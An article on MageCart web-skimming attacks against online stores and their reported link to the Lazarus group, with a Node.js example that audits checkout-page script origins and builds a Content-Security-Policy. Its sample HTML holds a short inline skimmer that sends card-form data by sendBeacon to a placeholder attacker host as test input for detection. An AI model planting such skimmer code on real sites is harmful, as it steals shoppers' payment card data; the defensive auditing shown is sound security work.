As a reminder, the name MageCart originally referred to a single hacking group, the first to plant web skimmers (malicious JavaScript) on the pages of online stores to steal payment card data. The approach proved so lucrative that the group soon attracted numerous imitators, and MageCart became a generic label that now designates a whole class of such attacks. Where RiskIQ researchers counted 12 such groups in 2018, IBM estimated about 40 by the end of 2019.
In such attacks, the hackers typically gain access to the store's web server, to a related resource, or to a third-party widget the store embeds, which lets them load and run malicious code in the browsers of the store's visitors.
The web skimmer is usually loaded only on the checkout page, where it silently captures payment card data as the customer types it into the payment form. The stolen data is sent to a server controlled by the attackers, who collect it and either use it themselves or sell it on the darknet.
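Because a skimmer needs two things on the checkout page, a script that runs there and an outbound channel to the attackers' server, the practical check is to enumerate every script origin the checkout page actually loads or talks to and compare it with the list of origins the store deliberately approved. The following Node.js snippet is an added example, not code from the original article or from any of the companies it names; the hostnames, the sample checkout HTML and the allowlist are all constructed for illustration. It flags any external script or embedded URL whose origin is not allowlisted, and emits a Content-Security-Policy that enforces the same allowlist in the browser, so that an injected inline skimmer cannot run and an exfiltration request to an unknown host is blocked by the browser itself.

```javascript
// Added example: audit the scripts on a checkout page against an allowlist of
// trusted origins, then build a Content-Security-Policy enforcing that list.
// All hostnames and the sample HTML below are constructed, not real sites.

// Origins the store's developers actually approved for the checkout page
// (hypothetical values).
const ALLOWED_ORIGINS = new Set([
  "https://shop.example",
  "https://js.payment-gateway.example",
]);

// Pull out external <script src=...> targets and any absolute URL literals
// that appear inside inline <script> bodies (a skimmer's exfil endpoint).
function extractScriptTargets(html) {
  const external = [];
  const inlineUrls = [];
  const scriptRe = /<script\b([^>]*)>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = scriptRe.exec(html)) !== null) {
    const attrs = m[1];
    const body = m[2];
    const src = /\bsrc\s*=\s*["']([^"']+)["']/i.exec(attrs);
    if (src) {
      external.push(src[1]);
    } else {
      const urlRe = /https?:\/\/[^\s"'<>)]+/g;
      let u;
      while ((u = urlRe.exec(body)) !== null) inlineUrls.push(u[0]);
    }
  }
  return { external, inlineUrls };
}

// Resolve a possibly relative URL against the page origin; null if unparsable.
function originOf(rawUrl, pageOrigin) {
  try {
    return new URL(rawUrl, pageOrigin).origin;
  } catch (e) {
    return null;
  }
}

// Every script source or embedded URL whose origin is not on the allowlist.
function findUnexpectedOrigins(html, pageOrigin, allowed = ALLOWED_ORIGINS) {
  const { external, inlineUrls } = extractScriptTargets(html);
  const findings = [];
  for (const src of external) {
    const o = originOf(src, pageOrigin);
    if (o && !allowed.has(o)) findings.push({ kind: "script-src", url: src, origin: o });
  }
  for (const u of inlineUrls) {
    const o = originOf(u, pageOrigin);
    if (o && !allowed.has(o)) findings.push({ kind: "inline-url", url: u, origin: o });
  }
  return findings;
}

// CSP restricting where scripts may load from and where the page may send
// data. 'unsafe-inline' is deliberately absent so an injected inline skimmer
// does not execute; legitimate inline code must move to allowlisted files.
function buildCheckoutCsp(allowed = ALLOWED_ORIGINS) {
  const list = [...allowed].join(" ");
  return [
    "default-src 'self'",
    `script-src ${list}`,
    `connect-src ${list}`,
    `form-action ${list}`,
    "object-src 'none'",
    "base-uri 'none'",
  ].join("; ");
}

// Constructed sample: the gateway's legitimate script, an unapproved widget,
// and an injected inline skimmer that beacons the card form to an attacker host.
const SAMPLE_CHECKOUT_HTML = `
<html><body>
<form id="checkout"><input name="cc_number"><input name="cc_cvv"></form>
<script src="/static/checkout.js"></script>
<script src="https://js.payment-gateway.example/v1/fields.js"></script>
<script src="https://cdn.stats-widget.example/w.js"></script>
<script>
  document.getElementById("checkout").addEventListener("submit", function () {
    var d = new FormData(this);
    navigator.sendBeacon("https://collect.bad-actor.example/g", d);
  });
</script>
</body></html>`;

if (typeof require !== "undefined" && require.main === module) {
  const findings = findUnexpectedOrigins(SAMPLE_CHECKOUT_HTML, "https://shop.example");
  for (const f of findings) console.log(`${f.kind}: ${f.url} (origin ${f.origin})`);
  console.log("Suggested CSP:", buildCheckoutCsp());
}
```

Run against the constructed page, the audit reports the unapproved statistics widget and the skimmer's collection host while accepting the store's own `/static/checkout.js` and the gateway script. The CSP is the enforcement half: `connect-src` and `form-action` cover `fetch`, `XMLHttpRequest`, `sendBeacon` and form posts, which is how skimmers usually exfiltrate, and leaving out `'unsafe-inline'` means a skimmer injected straight into the page body never runs. A compromised script on an allowlisted third-party origin still gets through, which is why the allowlist for a checkout page should be as short as possible and why Subresource Integrity on the scripts you do include is the natural next step.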
Mass attacks on online stores have been ongoing since roughly mid-2018. Among the most notable recent victims are Wongs Jewelers, Focus Camera, Paper Source, Jit Truck Parts, CBD Armor, Microbattery, Realchems and Claire's.
A recent SanSec report links specific domains and IP addresses used in recent MageCart attacks on US stores to previously known infrastructure of state-sponsored hackers. SanSec founder Willem de Groot writes that the evidence gathered points to the well-known North Korean group Lazarus (also tracked as Hidden Cobra) as being behind a series of attacks on American stores.
“How Hidden Cobra gained access (to the compromised stores) is still unknown, but attackers often use phishing attacks (malicious emails) to retrieve passwords of employees from the retail industry,” the expert writes.